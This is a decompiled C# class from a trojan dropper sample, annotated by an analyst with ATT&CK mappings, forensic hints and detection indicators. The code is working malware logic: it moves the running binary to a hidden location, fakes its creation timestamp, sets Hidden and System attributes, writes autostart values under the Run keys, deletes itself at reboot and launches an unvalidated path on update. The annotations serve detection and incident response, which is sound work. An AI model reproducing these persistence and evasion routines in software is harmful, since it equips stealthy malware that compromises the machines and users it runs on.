// Decompiled with JetBrains decompiler
// Type: Poly._Install
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
namespace Poly
{
  // Analyst summary (decompiled sample, read for detection and response purposes):
  // this class is the install / persistence / self-removal stage of the "Poly" assembly.
  // Behaviours visible in this file:
  //   - relocates the running executable to Base_Settings.filePath + Base_Settings.fileName
  //   - sets a randomised creation time on the dropped file (cf. ATT&CK T1070.006, Timestomp)
  //   - marks the install directory and file Hidden / System (cf. T1564.001)
  //   - writes an autostart value under ...\CurrentVersion\Run (cf. T1547.001)
  //   - on uninstall/update, removes the Run value and schedules the binary for deletion at reboot (cf. T1070.004)
  // Base_Settings, API and _communicate are declared elsewhere in the assembly; anything said about
  // them below is inferred from how they are used here and should be confirmed against their source.
  // The Console.WriteLine literals throughout are stable strings that can support static string matching.
  internal class _Install : Base_Settings
  {
    // Entry point of the install stage. Installs immediately when Base_Settings.wait is false;
    // otherwise polls the flag every 5 seconds and installs once it is cleared.
    public override void Initialise()
    {
      if (!Base_Settings.wait)
      {
        Console.WriteLine("Install called...");
        this.Install();
      }
      else
      {
        // Busy-wait with a 5000 ms sleep; nothing in this class clears the flag, so it is
        // presumably changed by other code in the assembly — confirm against Base_Settings.
        while (Base_Settings.wait)
        {
          Console.WriteLine("Sleeping just in time...");
          Thread.Sleep(5000);
        }
        // Re-check after the loop: this only returns if the flag was set again in the meantime.
        if (Base_Settings.wait)
          return;
        Console.WriteLine("Installing");
        this.Install();
      }
    }

    // Intentionally empty override; this stage does all of its work in Initialise().
    public override void Run()
    {
    }

    // Drops the binary, writes the autostart entry, and either relaunches from the install
    // location (terminating the current process) or just records the "Installed!" status.
    private void Install()
    {
      // isExePath() is defined in Base_Settings; presumably it reports whether the running image
      // already sits at the install location — TODO confirm.
      if (!Base_Settings.isExePath())
      {
        Console.WriteLine("Copying to specified disk location");
        this.Drop();
        this.WriteRegistry();
        Console.WriteLine("Successfully copied. Attempting to start process");
        // Process lineage for triage: the original process spawns the dropped copy and then kills itself,
        // so the parent of the new process exits almost immediately.
        Process.Start(Base_Settings.filePath + Base_Settings.fileName);
        Process.GetCurrentProcess().Kill();
      }
      else
      {
        this.Drop();
        this.WriteRegistry();
        Base_Settings.status = "Installed!";
      }
    }

    // Places the running executable at filePath + fileName and then alters its timestamp and
    // attributes. Every step is wrapped in its own try/catch, so a failure in one step does not
    // stop the following ones; three of the five catch blocks swallow the exception silently.
    private void Drop()
    {
      Console.WriteLine("Install Path is " + Base_Settings.filePath);
      try
      {
        if (!Directory.Exists(Base_Settings.filePath))
          Directory.CreateDirectory(Base_Settings.filePath);
      }
      catch (Exception ex)
      {
        // The message text does not match the situation: this branch runs when the
        // existence check or directory creation throws, not when a directory is being created.
        Console.WriteLine("Directory Not Found... Creating new one at" + Base_Settings.filePath + "\n" + ex.ToString());
      }
      try
      {
        // Target path is built by plain concatenation here, while the attribute and registry
        // code below uses Path.Combine; the two only agree if filePath ends with a separator.
        string str = Base_Settings.filePath + Base_Settings.fileName;
        Console.WriteLine("Moving to {0}", (object) str);
        // API.MoveFileEx is presumably a P/Invoke wrapper for the Win32 MoveFileEx call — confirm in API.
        // A move is tried first (the original file disappears from its download location);
        // if the call reports failure, the file is copied with overwrite instead.
        if (!API.MoveFileEx(Process.GetCurrentProcess().MainModule.FileName, str, API.MoveFileFlags.MOVEFILE_REPLACE_EXISTING))
          File.Copy(Process.GetCurrentProcess().MainModule.FileName, str, true);
        Console.WriteLine("File successfully moved to {0}", (object) (Base_Settings.filePath + Base_Settings.fileName));
      }
      catch (Exception ex)
      {
        Console.WriteLine("Could Not copy file to specified folder\n" + ex.ToString());
      }
      try
      {
        // Creation-time tampering. Random.Next's upper bound is exclusive, so the values are
        // day 1-27, month 1-11 and year 2000 .. (current year - 1), with a zero time-of-day.
        // Forensic note: the creation timestamp of the dropped file should not be trusted;
        // a creation time of exactly midnight on an old date is a useful triage hint, and it
        // can be compared with other timestamp sources for the same file.
        Random random = new Random();
        int day = random.Next(1, 28);
        int month = random.Next(1, 12);
        int year = random.Next(2000, DateTime.Now.Year);
        // Note that the Directory API is called with the full file path, not the directory path.
        Directory.SetCreationTime(Base_Settings.filePath + Base_Settings.fileName, new DateTime(year, month, day));
      }
      catch
      {
        // Failure is ignored; the file then keeps its real creation time.
      }
      try
      {
        // Install directory is flagged ReadOnly + Hidden + NotContentIndexed.
        File.SetAttributes(Base_Settings.filePath, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.NotContentIndexed);
      }
      catch
      {
      }
      try
      {
        // Dropped file is flagged Hidden + System + NotContentIndexed, which hides it from
        // default Explorer views; enumerate with hidden/system items shown when hunting.
        File.SetAttributes(Path.Combine(Base_Settings.filePath, Base_Settings.fileName), FileAttributes.Hidden | FileAttributes.System | FileAttributes.NotContentIndexed);
      }
      catch
      {
      }
    }

    // Writes the persistence entries. Value name is Base_Settings.regName and value data is the
    // combined install path. All registry errors are swallowed, so a failed write is silent.
    public void WriteRegistry()
    {
      try
      {
        // Autostart via the Run key: HKCU when not elevated, HKLM when Base_Settings.isAdmin is true.
        // Detection: monitor value creation under both Run keys and resolve the data to a
        // hidden/system file.
        if (!Base_Settings.isAdmin)
          Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
        else
          Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
      }
      catch
      {
      }
      try
      {
        // Only runs when isAdmin is true. The key is opened through Registry.CurrentUser, so the
        // artifact is a value named regName under HKCU\SYSTEM\CurrentControlSet\Services.
        // That path is unusual in a user hive, which makes its presence a good indicator.
        if (!Base_Settings.isAdmin)
          return;
        Registry.CurrentUser.CreateSubKey("SYSTEM\\CurrentControlSet\\Services").SetValue(Base_Settings.regName, (object) Path.Combine(Base_Settings.filePath, Base_Settings.fileName));
      }
      catch
      {
      }
    }

    // Removes the Run-key value and the installed copy, queues the running binary for deletion,
    // then waits 10 seconds and calls Base_Settings.cleanUp() (defined elsewhere).
    // Remediation note: Uninstall() does not touch the value that WriteRegistry() adds under
    // HKCU\SYSTEM\CurrentControlSet\Services when elevated, so it can remain afterwards.
    public static void Uninstall()
    {
      try
      {
        Base_Settings.status = "Removing";
        // CreateSubKey opens the key (creating it if missing) before the value is deleted.
        if (!Base_Settings.isAdmin)
          Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
        else
          Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run").DeleteValue(Base_Settings.regName);
        // Path.GetTempFileName creates an empty file on disk, so stray temp files in the
        // user's temp directory are a possible leftover of this routine.
        string tempFileName = Path.GetTempFileName();
        File.Copy(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
        File.Delete(Base_Settings.filePath + Base_Settings.fileName);
      }
      catch
      {
        // Any exception above (registry, copy into the already-created temp file, delete) is
        // swallowed, and the statements after the failing call are skipped without a trace.
      }
      _Install.QueueForDeletion();
      Base_Settings.busy = false;
      Thread.Sleep(10000);
      Base_Settings.cleanUp();
    }

    // Update path: starts Uninstall() on a background thread, reports status through
    // _communicate (defined elsewhere), and launches the executable at the given path.
    // The parameter is named Path and shadows System.IO.Path inside this method.
    // Where the path comes from is not visible here; presumably it is supplied by the
    // component that drives _communicate — TODO confirm in the caller.
    public static void Update(string Path)
    {
      new Thread(new ThreadStart(_Install.Uninstall)).Start();
      Base_Settings.status = "Updated";
      _communicate.setReturn(1);
      _communicate.forceTalk();
      // No validation of the path is done before it is executed.
      Process.Start(Path);
    }

    // Moves the running executable to a temp-file name, deletes the install directory
    // recursively, and registers the moved file for deletion at the next reboot.
    private static void QueueForDeletion()
    {
      try
      {
        // The temp file is created only to reserve a unique name; it is deleted so the
        // running image can be moved onto that name.
        string tempFileName = Path.GetTempFileName();
        File.Delete(tempFileName);
        File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
        try
        {
          Directory.Delete(Base_Settings.filePath, true);
        }
        catch
        {
        }
        // A null destination with MOVEFILE_DELAY_UNTIL_REBOOT asks Windows to delete the file
        // at next boot. Incident-response note: such requests are recorded in the
        // PendingFileRenameOperations value under the Session Manager key, and until the
        // reboot happens the binary is still recoverable from the temp directory.
        API.MoveFileEx(tempFileName, (string) null, API.MoveFileFlags.MOVEFILE_DELAY_UNTIL_REBOOT);
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.Message);
      }
    }
  }
}